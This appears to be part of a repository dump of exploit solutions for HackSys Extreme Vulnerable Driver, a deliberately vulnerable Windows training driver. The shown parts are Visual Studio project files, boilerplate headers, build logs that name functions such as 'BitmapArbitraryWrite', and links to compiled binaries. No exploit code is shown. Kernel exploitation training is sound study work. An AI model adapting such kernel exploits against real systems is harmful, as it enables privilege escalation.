 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |     </Link>
 95 |   </ItemDefinitionGroup>
 96 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 97 |     <ClCompile>
 98 |       <PrecompiledHeader>Use</PrecompiledHeader>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <Optimization>Disabled</Optimization>
101 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
102 |     </ClCompile>
103 |     <Link>
104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="HEVD-GDI-Bitmap-Exploit.cpp" />
146 |     <ClCompile Include="stdafx.cpp">
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
151 |     </ClCompile>
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/HEVD-GDI-Bitmap-Exploit.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD-GDI-Bitmap-Exploit.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/HEVD-GDI-Bitmap-Exploit.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD-GDI-Bitmap-Exploit Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD-GDI-Bitmap-Exploit application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD-GDI-Bitmap-Exploit application.
 9 | 
10 | 
11 | HEVD-GDI-Bitmap-Exploit.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD-GDI-Bitmap-Exploit.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD-GDI-Bitmap-Exploit.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD-GDI-Bitmap-Exploit.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD-GDI-Bitmap-Exploit.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.log:
--------------------------------------------------------------------------------
 1 |   HEVD-GDI-Bitmap-Exploit.cpp
 2 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(123): warning C4477: 'printf' : format string '%i' requires an argument of type 'int', but variadic argument 1 has type 'UINT64 *'
 3 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(123): warning C4313: 'printf': '%i' in format string conflicts with argument 1 of type 'UINT64 *'
 4 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(124): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'int *'
 5 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(144): warning C4477: 'printf' : format string '%x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'HBITMAP'
 6 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(144): warning C4313: 'printf': '%x' in format string conflicts with argument 1 of type 'HBITMAP'
 7 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(146): warning C4477: 'printf' : format string '%x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'DWORD64'
 8 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(146): note: consider using '%llx' in the format string
 9 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(146): note: consider using '%Ix' in the format string
10 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(146): note: consider using '%I64x' in the format string
11 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(150): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'DWORD64 *'
12 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(160): warning C4477: 'printf' : format string '%x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'HBITMAP'
13 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(160): warning C4313: 'printf': '%x' in format string conflicts with argument 1 of type 'HBITMAP'
14 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(162): warning C4477: 'printf' : format string '%x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'DWORD64'
15 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(162): note: consider using '%llx' in the format string
16 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(162): note: consider using '%Ix' in the format string
17 |   c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(162): note: consider using '%I64x' in the format string
18 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(164): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'DWORD64 *'
19 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(173): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'DWORD64 *'
20 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(174): warning C4477: 'printf' : format string '%llx' requires an argument of type 'unsigned __int64', but variadic argument 1 has type 'DWORD64 *'
21 | c:\users\test\documents\visual studio 2017\projects\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit\hevd-gdi-bitmap-exploit.cpp(81): warning C4715: 'BitmapArbitraryWrite': not all control paths return a value
22 |   HEVD-GDI-Bitmap-Exploit.vcxproj -> C:\Users\test\Documents\Visual Studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\x64\Debug\HEVD-GDI-Bitmap-Exploit.exe
23 |   HEVD-GDI-Bitmap-Exploit.vcxproj -> C:\Users\test\Documents\Visual Studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\x64\Debug\HEVD-GDI-Bitmap-Exploit.pdb (Partial PDB)
24 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.obj


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.pch


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/HEVD-GDI-Bitmap-Exploit.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|x64|C:\Users\test\Documents\Visual Studio 2017\Projects\HEVD-GDI-Bitmap-Exploit\|
3 | 


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/HEVD-GDI.21A858B1.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/hevd-gdi-bitmap-exploit.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/hevd-gdi-bitmap-exploit.obj.enc


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/HEVD-GDI-Bitmap-Exploit/x64/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.exe


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.ilk


--------------------------------------------------------------------------------
/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-GDI-Bitmap-Windows-10-x64-Pre-Anniversary-Exploit/x64/Debug/HEVD-GDI-Bitmap-Exploit.pdb


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.exe


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.ilk


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.pdb


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD-Null-Pointer", "HEVD-Null-Pointer\HEVD-Null-Pointer.vcxproj", "{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Debug|x64.Build.0 = Debug|x64
18 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Debug|x86.Build.0 = Debug|Win32
20 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Release|x64.ActiveCfg = Release|x64
21 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Release|x64.Build.0 = Release|x64
22 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Release|x86.ActiveCfg = Release|Win32
23 | 		{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/HEVD-Null-Pointer.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0
2 | Debug|Win32|C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Null-Pointer\|
3 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Nul.7A87B03E.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-null-pointer.pch.codeanalysis
